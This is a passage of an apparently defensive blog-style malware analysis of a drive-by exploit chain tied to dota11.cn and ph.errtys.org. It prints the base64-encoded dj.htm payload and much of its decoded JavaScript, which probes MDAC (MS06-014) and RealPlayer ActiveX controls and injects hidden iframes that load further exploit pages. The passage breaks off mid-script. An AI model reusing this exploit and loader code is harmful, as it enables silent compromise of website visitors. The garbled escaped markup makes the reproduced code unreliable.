in our lab are:&lt;/span&gt;&lt;/p&gt;     &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;m.js – Entry injection page&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;1847687.js – “// A Popular Free Statistics Service for 100 000+ Webmasters.”&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;456.htm – Loads 4561 or 4562 (swf)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;4561.swf – we decompiled this &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;4562.swf – we decompiled this too&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;am6.htm&lt;span style=""&gt;  &lt;/span&gt;- links to both http://ph.errtys.org/ax14.htm and http://ph.errtys.org/re10.htm - also includes activex objects and iframes of http://ph.errtys.org/axlz.htm and&lt;/span&gt;&lt;span style="" lang="EN-ZA"&gt; http://ph.errtys.org/re11.htm .&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;ax14.htm – javascripts and vbscript&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;axlz.htm - more scripts&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;bak.exe – l33t Trojan&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;dj – base64&lt;/span&gt;&lt;span style="" lang="EN-ZA"&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;dj.htm – includes “by shadow&lt;span style=""&gt;  &lt;/span&gt;MSN:kiss117276@live.cn&lt;span style=""&gt;   &lt;/span&gt;email:kiss117276@163.com and the base64. &lt;/span&gt;Microsoft Data Access Components (MDAC) Function (&lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx" target="_blank"&gt;MS06-014&lt;/a&gt;).&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;     &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;dj.output.base64.decode – out put of base64 – jscript and "Adodb.Stream"&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;     &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;re10.htm – Javascript + base64&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;re11.htm – Javascript – including the interesting text “fuckyoukaspersky”&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;All these files are from iframe’s or links from src code, which were originally from&lt;/span&gt;&lt;span style="" lang="EN-ZA"&gt; &lt;/span&gt;http://www.dota11.cn/m.js.&lt;/p&gt;     &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;A fantastic sitemap by Jeremy Conway details things very well:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_4Wfys5NtIhA/SEWygr8q5YI/AAAAAAAAABY/f9byNhqbISI/s1600-h/dota11_cn_m_js.jpg"&gt;&lt;img style="cursor: pointer; width: 430px; height: 526px;" src="http://4.bp.blogspot.com/_4Wfys5NtIhA/SEWygr8q5YI/AAAAAAAAABY/f9byNhqbISI/s320/dota11_cn_m_js.jpg" alt="" id="BLOGGER_PHOTO_ID_5207764818746598786" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;u&gt;&lt;span style="" lang="EN-ZA"&gt;Now if we take a look at Dj.htm:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;.HTML&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;.BODY&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;.title&gt;by shadow&lt;span style=""&gt;  &lt;/span&gt;MSN:kiss117276@live.cn&lt;span style=""&gt;   &lt;/span&gt;email: kiss117276@163.com&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;.script&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";while(i&lt;len){do{c1=base64decodechars[str.charcodeat(i++)&amp;amp;0xff]}while(i&gt;&lt;len&amp;amp;&amp;amp;c1==-1);if(c1==-1)break;do{c2=base64decodechars[str.charcodeat(i++)&amp;amp;0xff]}while(i&gt;&lt;len&amp;amp;&amp;amp;c2==-1);if(c2==-1)break;out+=string.fromcharcode((c1&gt;&lt;&lt;2)|((c2&amp;amp;0x30)&gt;&gt;4));do{c3=str.charCodeAt(i++)&amp;0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i&lt;len&amp;amp;&amp;amp;c3==-1);if(c3==-1)break;out+=string.fromcharcode(((c2&amp;amp;0xf)&gt;&lt;&lt;4)|((c3&amp;amp;0x3c)&gt;&gt;2));do{c4=str.charCodeAt(i++)&amp;0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i&lt;len&amp;amp;&amp;amp;c4==-1);if(c4==-1)break;out+=string.fromcharcode(((c3&amp;amp;0x03)&gt;&lt;&lt;6)|c4)}return&gt;&lt;/len&amp;amp;&amp;amp;c4==-1);if(c4==-1)break;out+=string.fromcharcode(((c3&amp;amp;0x03)&gt;&lt;/len&amp;amp;&amp;amp;c3==-1);if(c3==-1)break;out+=string.fromcharcode(((c2&amp;amp;0xf)&gt;&lt;/len&amp;amp;&amp;amp;c2==-1);if(c2==-1)break;out+=string.fromcharcode((c1&gt;&lt;/len&amp;amp;&amp;amp;c1==-1);if(c1==-1)break;do{c2=base64decodechars[str.charcodeat(i++)&amp;amp;0xff]}while(i&gt;&lt;/len){do{c1=base64decodechars[str.charcodeat(i++)&amp;amp;0xff]}while(i&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;document.write(base64decode ("PHNjcmlwdD53aW5kb3cub25lcnJvcj1mdW5jdGlvbigpe3JldHVybiB0cnVlO308L3NjcmlwdD4NCjxTY3JpcHQgTGFuZ3VhZ2U9IkpTY3JpcHQiPg0KCXZhciBjb29rID0gInNpbGVudHdtIjsNCgkNCglmdW5jdGlvbiBzZXRDb29raWUobmFtZSwgdmFsdWUsIGV4cGlyZSkgDQoJeyAgIA0KCQl3aW5kb3cuZG9jdW1lbnQuY29va2llID0gbmFtZSArICI9IiArIGVzY2FwZSh2YWx1ZSkgKyAoKGV4cGlyZSA9PSBudWxsKSA/ICIiIDogKCI7IGV4cGlyZXM9IiArIGV4cGlyZS50b0dNVFN0cmluZygpKSk7DQoJfQ0KDQoJZnVuY3Rpb24gZ2V0Q29va2llKE5hbWUpIA0KCXsgICANCgkJdmFyIHNlYXJjaCA9IE5hbWUgKyAiPSI7DQoJCWlmICh3aW5kb3cuZG9jdW1lbnQuY29va2llLmxlbmd0aCA+IDApIA0KCQl7IA0KCQkJb2Zmc2V0ID0gd2luZG93LmRvY3VtZW50LmNvb2tpZS5pbmRleE9mKHNlYXJjaCk7DQoJCQlpZiAob2Zmc2V0ICE9IC0xKSANCgkJCXsgDQoJCQkJb2Zmc2V0ICs9IHNlYXJjaC5sZW5ndGg7ICAgICAgIA0KCQkJICBlbmQgPSB3aW5kb3cuZG9jdW1lbnQuY29va2llLmluZGV4T2YoIjsiLCBvZmZzZXQpICAgICAgIA0KCQkJICBpZiAoZW5kID09IC0xKQ0KCQkJICAgIGVuZCA9IHdpbmRvdy5kb2N1bWVudC5jb29raWUubGVuZ3RoOw0KCQkJICByZXR1cm4gdW5lc2NhcGUod2luZG93LmRvY3VtZW50LmNvb2tpZS5zdWJzdHJpbmcob2Zmc2V0LCBlbmQpKTsNCgkJCSB9DQoJCSB9DQoJICByZXR1cm4gbnVsbDsNCgl9DQoNCglmdW5jdGlvbiByZWdpc3RlcihuYW1lKSANCgl7DQoJCXZhciB0b2RheSA9IG5ldyBEYXRlKCk7DQoJCXZhciBleHBpcmVzID0gbmV3IERhdGUoKTsNCgkJZXhwaXJlcy5zZXRUaW1lKHRvZGF5LmdldFRpbWUoKSArIDEwMDAqNjAqNjAqMjQpOw0KCQlzZXRDb29raWUoY29vaywgbmFtZSwgZXhwaXJlcyk7DQoJfQ0KDQoJZnVuY3Rpb24gb3BlbldNKCkgDQoJew0KCQl2YXIgYyA9IGdldENvb2tpZShjb29rKTsNCgkJaWYgKGMgIT0gbnVsbCkgDQoJCXsNCgkgIAlyZXR1cm47DQoJCX0NCgkJDQoJCXJlZ2lzdGVyKGNvb2spOw0KCQkNCgkJd2luZG93LmRlZmF1bHRTdGF0dXM9IuWujOaIkCI7DQoJCQkNCgkJdHJ5eyB2YXIgZTsNCgkJCXZhciBhZG89KGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoIm9iamVjdCIpKTsNCgkJCWFkby5zZXRBdHRyaWJ1dGUoImNsYXNzaWQiLCJjbHNpZDpCRDk2QzU1Ni02NUEzLTExRDAtOTgzQS0wMEMwNEZDMjlFMzYiKTsNCgkJCXZhciBhcz1hZG8uY3JlYXRlb2JqZWN0KCJBZG9kYi5TdHJlYW0iLCIiKX0NCgkJY2F0Y2goZSl7fTsNCgkJZmluYWxseXsNCgkJCWlmKGUhPSJbb2JqZWN0IEVycm9yXSIpew0KCQkJCWRvY3VtZW50LndyaXRlKCI8aWZyYW1lIHdpZHRoPTUwIGhlaWdodD0wIHNyYz0xNC5odG0+PC9pZnJhbWU+Iil9DQoJCQllbHNlDQoJCQl7CQ0KCQkJCXRyeXsgdmFyIGo7DQoJCQkJCXZhciByZWFsMTE9bmV3IEFjdGl2ZVhPYmplY3QoIklFUlAiKyJDdGwuSSIrIkVSUEN0bC4xIik7fQ0KCQkJCWNhdGNoKGope307DQoJCQkJZmluYWxseXtpZihqIT0iW29iamVjdCBFcnJvcl0iKXtpZihuZXcgQWN0aXZlWE9iamVjdCgiSUVSUEN0bC5JRVJQQ3RsLjEiKS5QbGF5ZXJQcm9wZXJ0eSgiUFJPRFVDVFZFUlNJT04iKTw9IjYuMC4xNC41NTIiKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHtkb2N1bWVudC53cml0ZSgnPGlmcmFtZSB3aWR0aD0xMCBoZWlnaHQ9MCBzcmM9cmwuaHRtPjwvaWZyYW1lPicpfQ0KICAgICAgICAgICAgICAgICAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICAgICAgICAgICB7DQoJCQkJCWRvY3VtZW50LndyaXRlKCc8aWZyYW1lIHdpZHRoPTEwIGhlaWdodD0wIHNyYz1uZXcuaHRtPjwvaWZyYW1lPicpfX19DQoNCgkJCQkJZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9NTAgaGVpZ2h0PTAgc3JjPTA0Lmh0bT48L2lmcmFtZT4nKQ0KDQoJCQkJaWYoaj09IltvYmplY3QgRXJyb3JdIikNCgkJCQl7bG9jYXRpb24ucmVwbGFjZSgiYWJvdXQ6YmxhbmsiKTt9DQoJCQl9fQ0KCX0NCg0Kb3BlbldNKCk7DQo8L3NjcmlwdD4="));&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;./script&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;./BODY&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;./HTML&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;We decoded this to the following script:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;.script&gt;window.onerror=function(){return true;}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;.Script Language="JScript"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;var cook = "silentwm";&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;function setCookie(name, value, expire)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;{&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;function getCookie(Name)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;{&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;var search = Name + "=";&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;if (window.document.cookie.length &gt; 0)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;{&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                        &lt;/span&gt;offset = window.document.cookie.indexOf(search);&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                        &lt;/span&gt;if (offset != -1)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                        &lt;/span&gt;{&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                                &lt;/span&gt;offset += search.length;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                          &lt;/span&gt;end = window.document.cookie.indexOf(";", offset)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                          &lt;/span&gt;if (end == -1)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                            &lt;/span&gt;end = window.document.cookie.length;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                          &lt;/span&gt;return unescape(window.document.cookie.substring(offset, end));&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                         &lt;/span&gt;}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                 &lt;/span&gt;}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;          &lt;/span&gt;return null;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;function register(name)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;{&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;var today = new Date();&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;var expires = new Date();&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;expires.setTime(today.getTime() + 1000*60*60*24);&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;setCookie(cook, name, expires);&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;function openWM()&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;{&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;var c = getCookie(cook);&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;  &lt;/span&gt;&lt;span style=""&gt;              &lt;/span&gt;if (c != null)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;{&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;return;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;register(cook);&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;window.defaultStatus="å®æ";&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;try{ var e;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                        &lt;/span&gt;var ado=(document.createElement("object"));&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                        &lt;/span&gt;ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                        &lt;/span&gt;var as=ado.createobject("Adodb.Stream","")}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;catch(e){};&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                &lt;/span&gt;finally{&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                        &lt;/span&gt;if(e!="[object Error]"){&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                                &lt;/span&gt;document.write("&lt;iframe src="14.htm" height="0" width="50"&gt;&lt;/iframe&gt;")}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                        &lt;/span&gt;else&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                        &lt;/span&gt;{&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                                &lt;/span&gt;try{ var j;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                                       &lt;/span&gt;&lt;span style=""&gt; &lt;/span&gt;var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                                &lt;/span&gt;catch(j){};&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                                &lt;/span&gt;finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")&lt;="6.0.14.552")&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                                        &lt;/span&gt;{document.write('&lt;iframe src="rl.htm" height="0" width="10"&gt;&lt;/iframe&gt;')}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                         &lt;/span&gt;else&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p 